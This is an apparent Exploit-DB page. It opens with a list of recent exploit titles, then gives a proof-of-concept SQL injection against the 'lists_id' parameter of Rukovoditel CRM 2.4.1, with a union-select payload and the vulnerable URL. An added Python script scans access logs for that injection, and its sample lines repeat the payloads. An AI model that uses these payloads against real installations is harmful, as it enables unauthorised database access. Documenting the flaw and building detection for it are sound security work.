
8 changes to exploits/shellcodes

Advanced File Manager 3.4.1 - Denial of Service (PoC)
iOS/macOS 10.13.6 - 'if_ports_used_update_wakeuuid()' 16-byte Uninitialized Kernel Stack Disclosure
IP-Tools 2.50 - Denial of Service SEH Overwrite (PoC)
Necrosoft DIG 0.4 - Denial of Service SEH Overwrite (PoC)
Faleemi Desktop Software 1.8 - Local Buffer Overflow (SEH)(DEP Bypass)
HTML5 Video Player 1.2.5 - Local Buffer Overflow - Non SEH
Faleemi Desktop Software 1.8 - Local Buffer Overflow (SEH) (DEP Bypass)
HTML5 Video Player 1.2.5 - Local Buffer Overflow (Non SEH)
10-Strike Network Inventory Explorer 8.54 - Local Buffer Overflow (SEH)(DEP Bypass)
PDF Signer 3.0 - SSTI to RCE via CSRF Cookie
PDF Signer 3.0 - Server-Side Template Injection leading to Remote Command Execution (via Cross-Site Request Forgery Cookie)
Rukovoditel Project Management CRM 2.4.1 - 'lists_id' SQL Injection
Windows/x86 - 'msiexec.exe' Download and Execute Shellcode (95 bytes)
41 lines
No EOL
1.5 KiB
Text
#################################################################

# Exploit Title: Rukovoditel Project Management CRM 2.4.1 - 'lists_id' SQL Injection
# Dork: N/A
# Date: 27-01-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://www.rukovoditel.net/
# Software Link: https://sourceforge.net/projects/rukovoditel/
# Version: 2.4.1
# Category: Webapps
# Tested on: Wampp @Win
# CVE: N/A
# Software Description: Rukovoditel is a free web-based open-source project
management application. A far cry from traditional applications, Rukovoditel
gives users a broader and extensive approach to project management. Its
customization options allow users to create additional entities, modify and
specify the relationship between them, and generate the necessary reports.

#################################################################

# Vulnerabilities
# For the SQL injection to be applied, the user must log in. Then, from the
Application structure screen, go to the global list tab and use the add new
value button to create a new list. The SQL injection can be applied through
the generated list.
Pictures of the weakness are below.
https://i.hizliresim.com/nQJZm5.jpg
https://i.hizliresim.com/WqGmEQ.jpg

#################################################################

# POC - SQLi
# Parameters : lists_id=1 (string)
# Attack Pattern : -1'+UnIOn+SeLEcT+1,2--+
# GET Request :
http://localhost/[PATH]/index.php?module=global_lists/choices&lists_id=1'[SQL]

#################################################################
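
Detection side of the request shown above, as an added example that is not part of the original advisory or of Rukovoditel's code: it scans web access logs for requests to module=global_lists/choices whose lists_id is not a plain integer. The log lines, the /crm/ path and the rule that legitimate list ids are short unsigned integers are assumptions made for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache access-log style (not real traffic).
SAMPLE_LOG = """\
192.0.2.10 - - [27/Jan/2019:10:00:01 +0000] "GET /crm/index.php?module=global_lists/choices&lists_id=1 HTTP/1.1" 200 5120
192.0.2.10 - - [27/Jan/2019:10:00:07 +0000] "GET /crm/index.php?module=global_lists/choices&lists_id=1%27 HTTP/1.1" 200 312
192.0.2.44 - - [27/Jan/2019:10:02:13 +0000] "GET /crm/index.php?module=global_lists%2Fchoices&lists_id=-1'+UnIOn+SeLEcT+1,2--+ HTTP/1.1" 200 498
192.0.2.44 - - [27/Jan/2019:10:02:20 +0000] "GET /crm/index.php?module=items/items&path=21 HTTP/1.1" 200 9001
192.0.2.51 - - [27/Jan/2019:10:03:02 +0000] "GET /crm/index.php?module=global_lists/choices&lists_id=7&lists_id=7%20or%201 HTTP/1.1" 200 300
"""

REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*"')
MODULE = "global_lists/choices"      # module named in the advisory
PARAM = "lists_id"                   # parameter named in the advisory
INT_RE = re.compile(r"[0-9]{1,10}")  # assumption: valid list ids are short unsigned integers


def suspicious_requests(log_text):
    """Return (client_ip, decoded lists_id) for each non-integer lists_id sent to the module."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line in the expected format
        ip, target = m.groups()
        # parse_qs percent-decodes and maps '+' to a space, as PHP does for $_GET,
        # so an encoded module name or encoded quote cannot slip past the check.
        query = parse_qs(urlsplit(target).query, keep_blank_values=True)
        if MODULE not in query.get("module", []):
            continue
        # PHP keeps the last duplicate of a parameter, so inspect every occurrence.
        for value in query.get(PARAM, []):
            if not INT_RE.fullmatch(value):
                hits.append((ip, value))
    return hits


if __name__ == "__main__":
    for ip, value in suspicious_requests(SAMPLE_LOG):
        print(f"{ip} sent non-integer {PARAM}: {value!r}")
```

The same allow-list (digits only) is what the application itself would enforce on lists_id before the value reaches a query, ideally together with a bound parameter.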